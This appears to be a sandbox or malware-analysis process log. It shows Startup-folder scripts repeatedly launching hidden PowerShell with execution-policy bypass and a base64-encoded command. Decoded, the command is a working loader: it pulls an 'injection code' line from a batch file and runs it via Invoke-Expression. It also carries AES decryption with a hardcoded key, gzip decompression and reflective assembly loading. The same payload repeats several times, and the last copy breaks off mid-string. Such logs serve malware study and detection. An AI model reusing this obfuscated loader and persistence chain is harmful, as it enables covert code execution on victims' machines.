Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXI